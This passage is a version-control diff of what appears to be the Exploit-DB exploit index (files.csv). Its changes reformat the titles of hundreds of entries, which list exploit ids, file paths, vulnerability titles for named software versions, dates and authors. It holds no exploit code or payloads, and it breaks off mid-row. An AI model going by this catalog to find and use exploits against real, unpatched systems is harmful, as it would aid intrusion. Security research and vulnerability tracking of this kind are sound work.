31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 - 'report_type' Cross-Site Scripting",2008-01-26,nnposter,php,webapps,0 31066,platforms/php/webapps/31066.txt,"Mambo MOStlyCE 2.4 Module - 'connector.php' Cross-Site Scripting",2008-01-28,"AmnPardaz ",php,webapps,0 31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 - 'install.php' Local File Inclusion",2008-01-28,p4imi0,php,webapps,0 -31068,platforms/php/webapps/31068.txt,"Mambo MOStlyCE Module 2.4 Image Manager Utility Arbitrary File Upload",2008-01-28,"AmnPardaz ",php,webapps,0 +31068,platforms/php/webapps/31068.txt,"Mambo MOStlyCE Module 2.4 Image Manager Utility - Arbitrary File Upload",2008-01-28,"AmnPardaz ",php,webapps,0 31069,platforms/php/webapps/31069.txt,"eTicket 1.5.6-RC4 - 'index.php' Cross-Site Scripting",2008-01-28,jekil,php,webapps,0 31070,platforms/asp/webapps/31070.txt,"ASPired2Protect Login Page SQL Injection",2008-01-28,T_L_O_T_D,asp,webapps,0 31071,platforms/cgi/webapps/31071.txt,"VB Marketing - 'tseekdir.cgi' Local File Inclusion",2008-01-28,"Sw33t h4cK3r",cgi,webapps,0 @@ -28012,7 +28012,7 @@ id,file,description,date,author,platform,type,port 31127,platforms/linux/remote/31127.txt,"Mozilla Firefox 2.0.9 - 'view-source:' Scheme Information Disclosure",2008-02-08,"Ronald van den Heetkamp",linux,remote,0 31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - HTTP POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 31129,platforms/php/webapps/31129.txt,"Managed Workplace Service Center 4.x/5.x/6.x - Installation Information Disclosure",2008-02-08,"Brook Powers",php,webapps,0 -31130,platforms/multiple/remote/31130.txt,"Apache Tomcat 6.0.15 Cookie Quote Handling Remote Information Disclosure",2008-02-09,"John Kew",multiple,remote,0 +31130,platforms/multiple/remote/31130.txt,"Apache Tomcat 6.0.15 - Cookie Quote Handling Remote Information Disclosure",2008-02-09,"John Kew",multiple,remote,0 31131,platforms/php/webapps/31131.txt,"PK-Designs PKs Movie Database 3.0.3 - 'index.php' SQL Injection / Cross-Site Scripting",2008-02-09,Houssamix,php,webapps,0 31132,platforms/hardware/remote/31132.txt,"Group Logic ExtremeZ-IP File and Print Servers 5.1.2 x15 - Multiple Vulnerabilities",2008-02-10,"Luigi Auriemma",hardware,remote,0 31133,platforms/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 Web Management Interface Cross-Site Request Forgery",2008-02-11,nnposter,hardware,remote,0 @@ -28072,13 +28072,13 @@ id,file,description,date,author,platform,type,port 31272,platforms/php/webapps/31272.txt,"Joomla! and Mambo 'com_joomlavvz' Component - 'id' Parameter SQL Injection",2008-02-20,S@BUN,php,webapps,0 31273,platforms/php/webapps/31273.txt,"Joomla! and Mambo 'com_most' Component - 'secid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0 31274,platforms/php/webapps/31274.txt,"Joomla! and Mambo 'com_asortyment' Component - 'katid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0 -31269,platforms/php/webapps/31269.txt,"Spyce 2.1.3 spyce/examples/formtag.spy Multiple Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 -31270,platforms/php/webapps/31270.txt,"Spyce 2.1.3 spyce/examples/automaton.spy Direct Request Error Message Information Disclosure",2007-02-19,"Richard Brain",php,webapps,0 +31269,platforms/php/webapps/31269.txt,"Spyce 2.1.3 - spyce/examples/formtag.spy Multiple Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 +31270,platforms/php/webapps/31270.txt,"Spyce 2.1.3 - spyce/examples/automaton.spy Direct Request Error Message Information Disclosure",2007-02-19,"Richard Brain",php,webapps,0 31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0 -31265,platforms/php/webapps/31265.txt,"Spyce 2.1.3 docs/examples/redirect.spy Multiple Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 -31266,platforms/php/webapps/31266.txt,"Spyce 2.1.3 docs/examples/handlervalidate.spy x Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 -31267,platforms/php/webapps/31267.txt,"Spyce 2.1.3 spyce/examples/request.spy name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 -31268,platforms/php/webapps/31268.txt,"Spyce 2.1.3 spyce/examples/getpost.spy Name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 +31265,platforms/php/webapps/31265.txt,"Spyce 2.1.3 - docs/examples/redirect.spy Multiple Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 +31266,platforms/php/webapps/31266.txt,"Spyce 2.1.3 - docs/examples/handlervalidate.spy x Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 +31267,platforms/php/webapps/31267.txt,"Spyce 2.1.3 - spyce/examples/request.spy name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 +31268,platforms/php/webapps/31268.txt,"Spyce 2.1.3 - spyce/examples/getpost.spy Name Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 31189,platforms/java/webapps/31189.txt,"Cisco Unified Communications Manager 6.1 - 'key' Parameter SQL Injection",2008-02-13,"Nico Leidecker",java,webapps,0 31191,platforms/asp/webapps/31191.txt,"Site2Nite Real Estate Web - 'agentlist.asp' Multiple SQL Injection",2008-02-13,S@BUN,asp,webapps,0 31192,platforms/php/webapps/31192.txt,"Joomla! and Mambo com_model Component - 'objid' Parameter SQL Injection",2008-02-13,S@BUN,php,webapps,0 @@ -28162,7 +28162,7 @@ id,file,description,date,author,platform,type,port 31261,platforms/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,hardware,webapps,443 31262,platforms/php/webapps/31262.txt,"ManageEngine Support Center Plus 7916 - Directory Traversal",2014-01-29,xistence,php,webapps,80 31263,platforms/php/webapps/31263.txt,"pfSense 2.1 build 20130911-1816 - Directory Traversal",2014-01-29,@u0x,php,webapps,0 -31264,platforms/php/remote/31264.rb,"Simple E-Document Arbitrary File Upload",2014-01-29,Metasploit,php,remote,80 +31264,platforms/php/remote/31264.rb,"Simple E-Document - Arbitrary File Upload",2014-01-29,Metasploit,php,remote,80 31275,platforms/asp/webapps/31275.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 - Comments.asp FC Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 31276,platforms/asp/webapps/31276.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 Labels.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 31277,platforms/php/webapps/31277.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 ClassList.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps,0 @@ -28439,7 +28439,7 @@ id,file,description,date,author,platform,type,port 31573,platforms/ios/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,ios,webapps,8880 31574,platforms/arm/local/31574.c,"Linux Kernel < 3.4.5 (ARM Android 4.2.2 / 4.4) - Local Root Exploit",2014-02-11,"Piotr Szerman",arm,local,0 31575,platforms/windows/remote/31575.rb,"KingScada - kxClientDownload.ocx ActiveX Remote Code Execution",2014-02-11,Metasploit,windows,remote,0 -31576,platforms/windows/local/31576.rb,"Windows TrackPopupMenuEx Win32k NULL Page",2014-02-11,Metasploit,windows,local,0 +31576,platforms/windows/local/31576.rb,"Windows - TrackPopupMenuEx Win32k NULL Page",2014-02-11,Metasploit,windows,local,0 31577,platforms/unix/remote/31577.rb,"Kloxo - SQL Injection / Remote Code Execution",2014-02-11,Metasploit,unix,remote,7778 31578,platforms/windows/webapps/31578.txt,"Tableau Server - Blind SQL Injection",2014-02-11,"Trustwave's SpiderLabs",windows,webapps,80 31579,platforms/windows/webapps/31579.txt,"Titan FTP Server 10.32 Build 1816 - Directory Traversal",2014-02-11,"Fara Rustein",windows,webapps,0 @@ -28833,13 +28833,13 @@ id,file,description,date,author,platform,type,port 31977,platforms/php/webapps/31977.txt,"The Rat CMS viewarticle.php id Parameter SQL Injection",2008-06-26,"CWH Underground",php,webapps,0 31978,platforms/php/webapps/31978.txt,"The Rat CMS viewarticle2.php id Parameter SQL Injection",2008-06-26,"CWH Underground",php,webapps,0 31979,platforms/linux/dos/31979.html,"GNOME Evolution 2.22.2 - 'html_engine_get_view_width()' Denial Of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0 -31980,platforms/windows/remote/31980.html,"UUSee 2008 UUUpgrade ActiveX Control 'Update' Method Arbitrary File Download",2008-06-26,Symantec,windows,remote,0 +31980,platforms/windows/remote/31980.html,"UUSee 2008 - UUUpgrade ActiveX Control 'Update' Method Arbitrary File Download",2008-06-26,Symantec,windows,remote,0 31981,platforms/php/webapps/31981.txt,"PolyPager 0.9.51/1.0 - 'nr' Parameter Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps,0 31982,platforms/php/webapps/31982.txt,"Webuzo 2.1.3 - Multiple Vulnerabilities",2014-02-28,Mahendra,php,webapps,80 32134,platforms/php/webapps/32134.txt,"H0tturk Panel - 'gizli.php' Remote File Inclusion",2008-07-31,U238,php,webapps,0 31983,platforms/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400 31986,platforms/php/webapps/31986.txt,"WordPress VideoWhisper 4.27.3 Plugin - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 -31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,Metasploit,windows,remote,80 +31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY - gefebt.exe Remote Code Execution",2014-02-28,Metasploit,windows,remote,80 31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 - (Settings.ini) SEH Buffer Overflow (Metasploit)",2014-02-28,Metasploit,windows,local,0 31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 - (SalesInquiry.php SortBy param) SQL Injection",2014-02-28,HauntIT,php,webapps,80 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",multiple,webapps,0 @@ -28863,7 +28863,7 @@ id,file,description,date,author,platform,type,port 32009,platforms/unix/dos/32009.txt,"QNX Neutrino RTOS 6.3 - 'phgrafx' Local Buffer Overflow",2008-07-01,"Filipe Balestra",unix,dos,0 32010,platforms/php/webapps/32010.txt,"Joomla! and Mambo 'com_is' 1.0.1 Component - Multiple SQL Injection",2008-07-02,"H-T Team",php,webapps,0 32011,platforms/php/webapps/32011.txt,"DodosMail 2.5 - 'dodosmail.php' Local File Inclusion",2008-07-07,ahmadbady,php,webapps,0 -32012,platforms/linux/remote/32012.txt,"Netrw 125 Vim Script Multiple Command Execution Vulnerabilities",2008-07-07,"Jan Minar",linux,remote,0 +32012,platforms/linux/remote/32012.txt,"Netrw 125 Vim Script - Multiple Command Execution Vulnerabilities",2008-07-07,"Jan Minar",linux,remote,0 32013,platforms/php/webapps/32013.txt,"Zoph 0.7.2.1 - Unspecified SQL Injection",2008-07-07,"Julian Rodriguez",php,webapps,0 32014,platforms/php/webapps/32014.txt,"Zoph 0.7.2.1 - search.php _off Parameter XSS",2008-07-07,"Julian Rodriguez",php,webapps,0 32015,platforms/php/webapps/32015.txt,"PHP-Nuke 4ndvddb 0.91 Module - 'id' Parameter SQL Injection",2008-07-07,Lovebug,php,webapps,0 @@ -28896,13 +28896,13 @@ id,file,description,date,author,platform,type,port 32132,platforms/windows/remote/32132.py,"GetGo Download Manager 4.9.0.1982 - HTTP Response Header Buffer Overflow Remote Code Execution",2014-03-09,"Julien Ahrens",windows,remote,0 32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 - 'pid' Parameter SQL Injection",2008-08-21,"Hussin X",php,webapps,0 32284,platforms/php/webapps/32284.txt,"Simasy CMS - 'id' Parameter SQL Injection",2008-08-21,r45c4l,php,webapps,0 -32049,platforms/windows/remote/32049.txt,"Microsoft Internet Explorer 6.0 New ActiveX Object String Concatenation Memory Corruption",2008-07-14,0x000000,windows,remote,0 +32049,platforms/windows/remote/32049.txt,"Microsoft Internet Explorer 6.0 New - ActiveX Object String Concatenation Memory Corruption",2008-07-14,0x000000,windows,remote,0 32050,platforms/windows/local/32050.py,"Calavera UpLoader 3.5 - SEH Buffer Overflow",2014-03-04,"Daniel la calavera",windows,local,0 32051,platforms/php/webapps/32051.php,"Pubs Black Cat [The Fun] - 'browse.groups.php' SQL Injection",2008-07-14,RMx,php,webapps,0 -32052,platforms/windows/remote/32052.html,"Sina DLoader Class ActiveX Control 'DonwloadAndInstall' Method Arbitrary File Download",2008-07-14,Symantec,windows,remote,0 +32052,platforms/windows/remote/32052.html,"Sina DLoader Class - ActiveX Control 'DonwloadAndInstall' Method Arbitrary File Download",2008-07-14,Symantec,windows,remote,0 32053,platforms/php/webapps/32053.txt,"WordPress 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-15,anonymous,php,webapps,0 32054,platforms/windows/dos/32054.py,"MediaMonkey 3.0.3 URI Handling Multiple Denial of Service Vulnerabilities",2008-07-16,Shinnok,windows,dos,0 -32055,platforms/multiple/local/32055.txt,"Netrw Vim Script 's:BrowserMaps()' Command Execution",2008-07-16,"Jan Minar",multiple,local,0 +32055,platforms/multiple/local/32055.txt,"Netrw Vim Script - 's:BrowserMaps()' Command Execution",2008-07-16,"Jan Minar",multiple,local,0 32056,platforms/windows/dos/32056.py,"BitComet 1.02 URI Handling Remote Denial of Service",2008-07-16,Shinnok,windows,dos,0 32057,platforms/php/webapps/32057.txt,"Evaria ECMS 1.1 - 'DOCUMENT_ROOT' Parameter Multiple Remote File Inclusion",2008-07-16,ahmadbady,php,webapps,0 32058,platforms/php/webapps/32058.txt,"OpenPro 1.3.1 - 'search_wA.php' Remote File Inclusion",2008-07-16,"Ghost Hacker",php,webapps,0 @@ -28918,8 +28918,8 @@ id,file,description,date,author,platform,type,port 32068,platforms/php/webapps/32068.txt,"Claroline 1.8.9 phpbb/viewtopic.php URL XSS",2008-07-15,"Digital Security Research Group",php,webapps,0 32069,platforms/php/webapps/32069.txt,"Claroline 1.8.9 wiki/wiki.php URL XSS",2008-07-15,"Digital Security Research Group",php,webapps,0 32070,platforms/php/webapps/32070.txt,"Claroline 1.8.9 work/work.php URL XSS",2008-07-15,"Digital Security Research Group",php,webapps,0 -32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 claroline/redirector.php url Variable Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0 -32074,platforms/windows/local/32074.rb,"ALLPlayer M3U Buffer Overflow",2014-03-05,Metasploit,windows,local,0 +32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 claroline/redirector.php url Variable - Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0 +32074,platforms/windows/local/32074.rb,"ALLPlayer - .M3U Buffer Overflow",2014-03-05,Metasploit,windows,local,0 32075,platforms/php/webapps/32075.txt,"OpenDocMan 1.2.7 - Multiple Vulnerabilities",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32076,platforms/php/webapps/32076.txt,"Ilch CMS 2.0 - Persistent XSS",2014-03-05,"High-Tech Bridge SA",php,webapps,80 32077,platforms/php/webapps/32077.txt,"IBS 0.15 - 'username' Parameter Cross-Site Scripting",2008-07-17,Cyb3r-1sT,php,webapps,0 @@ -28955,10 +28955,10 @@ id,file,description,date,author,platform,type,port 32109,platforms/php/webapps/32109.txt,"Claroline 1.8 tracking/toolaccess_details.php toolId Parameter XSS",2008-07-22,DSecRG,php,webapps,0 32110,platforms/multiple/remote/32110.txt,"Outpost Security Suite Pro 2009 - Filename Parsing Security Bypass",2008-07-22,"Juan Pablo Lopez Yacubian",multiple,remote,0 32111,platforms/asp/webapps/32111.txt,"Pre Survey Generator - 'default.asp' SQL Injection",2008-07-22,DreamTurk,asp,webapps,0 -32112,platforms/linux/dos/32112.txt,"Minix 3.1.2a Psuedo Terminal Denial of Service",2008-07-23,kokanin,linux,dos,0 +32112,platforms/linux/dos/32112.txt,"Minix 3.1.2a - Psuedo Terminal Denial of Service",2008-07-23,kokanin,linux,dos,0 32113,platforms/php/webapps/32113.txt,"EMC Centera Universal Access 4.0_4735.p4 - 'username' Parameter SQL Injection",2008-07-23,"Lars Heidelberg",php,webapps,0 32114,platforms/php/webapps/32114.txt,"AtomPhotoBlog 1.15 - 'atomPhotoBlog.php' SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 -32115,platforms/php/webapps/32115.txt,"Ajax File Manager Directory Traversal",2014-03-07,"Eduardo Alves",php,webapps,0 +32115,platforms/php/webapps/32115.txt,"Ajax File Manager - Directory Traversal",2014-03-07,"Eduardo Alves",php,webapps,0 32116,platforms/php/webapps/32116.txt,"ezContents - 'minicalendar.php' Remote File Inclusion",2008-07-25,"HACKERS PAL",php,webapps,0 32117,platforms/php/webapps/32117.txt,"Willoughby TriO 2.1 - SQL Injection",2008-07-26,dun,php,webapps,0 32118,platforms/php/webapps/32118.txt,"Greatclone GC Auction Platinum - 'category.php' SQL Injection",2008-07-27,"Hussin X",php,webapps,0 @@ -28999,7 +28999,7 @@ id,file,description,date,author,platform,type,port 32158,platforms/windows/local/32158.txt,"iCAM Workstation Control 4.8.0.0 - Authentication Bypass",2014-03-10,StealthHydra,windows,local,0 32161,platforms/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",hardware,webapps,80 32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - (upload.php filename param) Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 -32163,platforms/windows/remote/32163.rb,"SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write",2014-03-10,Metasploit,windows,remote,30000 +32163,platforms/windows/remote/32163.rb,"SolidWorks Workgroup PDM 2014 - pdmwService.exe Arbitrary File Write",2014-03-10,Metasploit,windows,remote,30000 32164,platforms/windows/remote/32164.rb,"HP Data Protector - Backup Client Service Remote Code Execution",2014-03-10,Metasploit,windows,remote,5555 32165,platforms/linux/remote/32165.txt,"XAMPP Linux 1.6 - ming.php text Parameter XSS",2008-08-04,"Khashayar Fereidani",linux,remote,0 32166,platforms/linux/remote/32166.txt,"XAMPP Linux 1.6 - iart.php text Parameter XSS",2008-08-04,"Khashayar Fereidani",linux,remote,0 @@ -29025,7 +29025,7 @@ id,file,description,date,author,platform,type,port 32186,platforms/php/webapps/32186.txt,"Quate CMS 0.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0 32187,platforms/php/webapps/32187.txt,"com_utchat component Mambo and Joomla! Component 0.2 - Multiple Remote File Inclusion",2008-08-06,by_casper41,php,webapps,0 32188,platforms/php/webapps/32188.txt,"Multiple WebmasterSite Products - Remote Command Execution",2008-08-06,otmorozok428,php,webapps,0 -32189,platforms/multiple/remote/32189.py,"DD-WRT Site Survey SSID Script Injection",2008-08-06,"Rafael Dominguez Vega",multiple,remote,0 +32189,platforms/multiple/remote/32189.py,"DD-WRT - Site Survey SSID Script Injection",2008-08-06,"Rafael Dominguez Vega",multiple,remote,0 32190,platforms/php/webapps/32190.txt,"Kshop 2.22 - 'kshop_search.php' Cross-Site Scripting",2008-08-06,Lostmon,php,webapps,0 32191,platforms/php/webapps/32191.txt,"PHP-Nuke Kleinanzeigen Module - 'lid' Parameter SQL Injection",2008-08-06,Lovebug,php,webapps,0 32192,platforms/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial Of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",multiple,dos,0 @@ -29045,8 +29045,8 @@ id,file,description,date,author,platform,type,port 32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0 32207,platforms/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",php,webapps,80 32208,platforms/multiple/dos/32208.txt,"Oracle VirtualBox 3D Acceleration - Multiple Vulnerabilities",2014-03-12,"Core Security",multiple,dos,0 -32209,platforms/windows/remote/32209.rb,"Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow",2014-03-12,Metasploit,windows,remote,20171 -32210,platforms/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow",2014-03-12,Metasploit,windows,remote,20111 +32209,platforms/windows/remote/32209.rb,"Yokogawa CENTUM CS 3000 - BKHOdeq.exe Buffer Overflow",2014-03-12,Metasploit,windows,remote,20171 +32210,platforms/windows/remote/32210.rb,"Yokogawa CENTUM CS 3000 - BKBCopyD.exe Buffer Overflow",2014-03-12,Metasploit,windows,remote,20111 32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - (CSRF/Blind SQL Injection) Multiple Vulnerabilities",2014-03-12,"TUNISIAN CYBER",php,webapps,80 32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - data.aspx Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80 32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - (browse.php file param) Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 @@ -29056,7 +29056,7 @@ id,file,description,date,author,platform,type,port 32220,platforms/php/webapps/32220.txt,"Kayako SupportSuite 3.x - index.php filter Parameter XSS",2008-08-11,"James Bercegay",php,webapps,0 32221,platforms/php/webapps/32221.txt,"Kayako SupportSuite 3.x - staff/index.php customfieldlinkid Parameter SQL Injection",2008-08-11,"James Bercegay",php,webapps,0 32222,platforms/multiple/dos/32222.rb,"Ruby 1.9 WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request DoS",2008-08-11,"Keita Yamaguchi",multiple,dos,0 -32223,platforms/multiple/remote/32223.rb,"Ruby 1.9 dl Module DL.dlopen Arbitrary Library Access",2008-08-11,"Keita Yamaguchi",multiple,remote,0 +32223,platforms/multiple/remote/32223.rb,"Ruby 1.9 dl Module DL.dlopen - Arbitrary Library Access",2008-08-11,"Keita Yamaguchi",multiple,remote,0 32224,platforms/multiple/remote/32224.rb,"Ruby 1.9 - Safe Level Multiple Function Restriction Bypass",2008-08-11,"Keita Yamaguchi",multiple,remote,0 32225,platforms/linux/remote/32225.txt,"Vim 'mch_expand_wildcards()' - Heap Based Buffer Overflow",2005-01-29,"Brian Hirt",linux,remote,0 32226,platforms/php/webapps/32226.txt,"Datafeed Studio - 'patch.php' Remote File Inclusion",2008-08-12,"Bug Researchers Group",php,webapps,0 @@ -29199,7 +29199,7 @@ id,file,description,date,author,platform,type,port 32386,platforms/multiple/dos/32386.txt,"Unreal Engine - 'UnChan.cpp' Failed Assertion Remote Denial of Service",2008-09-16,"Luigi Auriemma",multiple,dos,0 32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injection",2008-09-25,"David Sopas",php,webapps,0 32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Inclusion",2008-09-25,Pepelux,php,webapps,0 -32420,platforms/windows/dos/32420.c,"Mass Downloader Malformed Executable Denial Of Service",2008-09-25,Ciph3r,windows,dos,0 +32420,platforms/windows/dos/32420.c,"Mass Downloader - Malformed Executable Denial Of Service",2008-09-25,Ciph3r,windows,dos,0 32421,platforms/php/webapps/32421.html,"FlatPress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0 32422,platforms/php/webapps/32422.txt,"Vikingboard 0.2 Beta - 'register.php' SQL Column Truncation Unauthorized Access",2008-09-25,StAkeR,php,webapps,0 32423,platforms/jsp/webapps/32423.txt,"OpenNms 1.5.x - j_acegi_security_check j_username Parameter XSS",2008-09-25,d2d,jsp,webapps,0 @@ -29212,7 +29212,7 @@ id,file,description,date,author,platform,type,port 32430,platforms/cgi/webapps/32430.txt,"WhoDomLite 1.1.3 - 'wholite.cgi' Cross-Site Scripting",2008-09-27,"Ghost Hacker",cgi,webapps,0 32431,platforms/php/webapps/32431.txt,"Lyrics Script - 'search_results.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",php,webapps,0 32432,platforms/php/webapps/32432.txt,"Clickbank Portal - 'search.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",php,webapps,0 -32433,platforms/php/webapps/32433.txt,"Membership Script Multiple Cross-Site Scripting Vulnerabilities",2008-09-27,"Ghost Hacker",php,webapps,0 +32433,platforms/php/webapps/32433.txt,"Membership Script - Multiple Cross-Site Scripting Vulnerabilities",2008-09-27,"Ghost Hacker",php,webapps,0 32434,platforms/php/webapps/32434.txt,"Recipe Script - 'search.php' Cross-Site Scripting",2008-09-27,"Ghost Hacker",php,webapps,0 32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0 32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE",2014-03-22,"Brandon Perry",php,webapps,0 @@ -29241,8 +29241,8 @@ id,file,description,date,author,platform,type,port 32460,platforms/windows/remote/32460.txt,"XAMPP for Windows 1.6.8 - 'phonebook.php' SQL Injection",2008-10-06,"Jaykishan Nirmal",windows,remote,0 32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps,0 32462,platforms/php/webapps/32462.txt,"Simple Machines Forum 1.1.6 HTTP POST Request Filter Security Bypass",2008-10-06,WHK,php,webapps,0 -32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 -32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b edit.php file Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 +32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 +32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - edit.php file Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32465,platforms/windows/remote/32465.pl,"Internet Download Manager 4.0.5 - File Parsing Buffer Overflow",2008-10-06,Ciph3r,windows,remote,0 32466,platforms/multiple/remote/32466.html,"Mozilla Firefox 3.0.3 Internet Shortcut Same Origin Policy Violation",2008-10-07,"Liu Die Yu",multiple,remote,0 32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 URI Redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0 @@ -29267,7 +29267,7 @@ id,file,description,date,author,platform,type,port 32485,platforms/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi - 'xurunler.asp' SQL Injection",2008-10-13,tRoot,asp,webapps,0 32486,platforms/php/webapps/32486.txt,"Webscene eCommerce - 'productlist.php' SQL Injection",2008-10-14,"Angela Chang",php,webapps,0 32487,platforms/php/webapps/32487.txt,"Elxis CMS 2008.1 modules/mod_language.php Multiple Parameter XSS",2008-10-14,faithlove,php,webapps,0 -32488,platforms/php/webapps/32488.txt,"Elxis CMS 2008.1 PHPSESSID Variable Session Fixation",2008-10-14,faithlove,php,webapps,0 +32488,platforms/php/webapps/32488.txt,"Elxis CMS 2008.1 - PHPSESSID Variable Session Fixation",2008-10-14,faithlove,php,webapps,0 32489,platforms/windows/remote/32489.txt,"Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' URI Redirection",2008-10-15,"Martin Suess",windows,remote,0 32490,platforms/php/webapps/32490.txt,"SweetCMS 1.5.2 - 'index.php' SQL Injection",2008-10-14,Dapirates,php,webapps,0 32491,platforms/windows/remote/32491.html,"Hummingbird HostExplorer 6.2/8.0 - ActiveX Control 'PlainTextPassword()' Buffer Overflow",2008-10-16,"Thomas Pollet",windows,remote,0 @@ -29356,11 +29356,11 @@ id,file,description,date,author,platform,type,port 32579,platforms/jsp/webapps/32579.html,"Sun Java System Identity Manager 6.0/7.x - Multiple Vulnerabilities",2008-11-11,"Richard Brain",jsp,webapps,0 32580,platforms/asp/webapps/32580.txt,"ASP-Nuke 2.0.7 - 'gotourl.asp' Open Redirect",2014-03-29,"felipe andrian",asp,webapps,0 32581,platforms/multiple/dos/32581.txt,"Zope 2.11.2 PythonScript Multiple Remote Denial Of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",multiple,dos,0 -32582,platforms/hardware/remote/32582.txt,"Belkin F5D8233-4 Wireless N Router Multiple Scripts Authentication Bypass Vulnerabilities",2008-11-12,"Craig Heffner",hardware,remote,0 +32582,platforms/hardware/remote/32582.txt,"Belkin F5D8233-4 Wireless N Router - Multiple Scripts Authentication Bypass Vulnerabilities",2008-11-12,"Craig Heffner",hardware,remote,0 32583,platforms/hardware/dos/32583.txt,"NETGEAR WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0 32585,platforms/windows/local/32585.py,"AudioCoder 0.8.29 - Memory Corruption (SEH)",2014-03-30,sajith,windows,local,0 32586,platforms/windows/remote/32586.py,"Microsoft Active Directory LDAP Server Username Enumeration Weakness",2008-11-14,"Bernardo 